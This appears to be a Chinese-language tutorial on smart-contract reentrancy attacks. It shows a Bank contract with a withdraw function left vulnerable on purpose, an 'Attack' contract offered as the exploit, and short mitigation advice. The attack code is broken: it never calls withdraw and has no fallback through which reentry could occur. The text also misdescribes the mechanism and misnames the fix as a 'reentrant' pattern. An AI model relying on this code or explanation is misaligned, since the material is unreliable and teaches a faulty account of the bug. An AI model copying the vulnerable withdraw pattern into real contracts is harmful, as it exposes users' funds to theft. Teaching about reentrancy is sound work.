# 重新进入攻击

重新进入攻击是一种常见的智能合约漏洞，可以让攻击者绕过应用程序设计的限制，从而访问他们没有权限访问的代码。

在本示例中，我们将创建一个名为 `Bank` 的银行合约，允许用户存款、提款和查询余额。但是，该合同存在一个重大漏洞，允许攻击者通过多次调用 `withdraw` 函数来不断提取更多的资金。

```solidity
pragma solidity ^0.5.16;

contract Bank {
    mapping(address => uint256) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 _amount) public {
        require(balances[msg.sender] >= _amount);

        (bool success, ) = msg.sender.call.value(_amount)("");
        require(success);

        balances[msg.sender] -= _amount;
    }
}
```

在此示例中，我们定义了一个名为 `Bank` 的合约。该合同使用映射来跟踪每个地址的余额，并实现了两个函数： `deposit` 和 `withdraw`。

使用 `deposit` 函数，用户可以向他们的账户存款。使用 `withdraw` 函数，用户可以从他们的账户中提取指定金额的资金。

然而，`withdraw` 函数存在安全问题，因为它未能正确处理重入攻击。当攻击者调用此功能时，如果攻击者的合约在调用此函数时重新进入，那么攻击者可以再次访问该函数，并从受影响的账户中提取更多资金。

为了利用这个漏洞，攻击者需要编写一个恶意合约，它会在调用 `withdraw` 函数时重新进入，并不断调用 `withdraw` 函数，直到向攻击者的地址转移所有资金。

```solidity
pragma solidity ^0.5.16;

contract Attack {
    address payable public target;
    uint256 public amount;

    constructor(address payable _target) public payable {
        target = _target;
        amount = msg.value;
    }

    function attack() public {
        // 调用合同提款函数
        (bool success, ) = target.call.value(amount)("");
        require(success);

        // 重入合同继续调用提款函数
        target.call.value(amount)("");
    }
}
```

在此示例中，我们定义了一个名为 `Attack` 的恶意合同。该合同接受一个目标合同的地址，并通过构造函数将一定数量的以太币存储在该合同中。

使用 `attack` 函数，攻击者可以重复调用目标合同的 `withdraw` 函数，从而不断提取更多的资金。攻击者在每次调用该函数时都会调用自己的合同 `Attack`，因此可以无限制地调用受影响的银行合同。

为了防止这种攻击，我们可以使用锁定机制，确保在一个函数执行期间不会再次调用该函数。一种解决方案是使用 `bool` 变量来跟踪当前是否正在执行某个函数。另一种解决方案是使用可重入合约设计模式避免这个问题。

但是需要注意的是，在编写智能合约时，务必格外小心，并确保正确处理所有可能的攻击场景。